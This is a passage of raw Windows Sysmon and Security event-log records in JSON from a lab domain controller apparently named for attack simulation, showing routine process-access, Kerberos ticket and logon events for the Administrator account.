ll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.221\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.221","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220548,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220549,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220550,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220551,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A60B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services 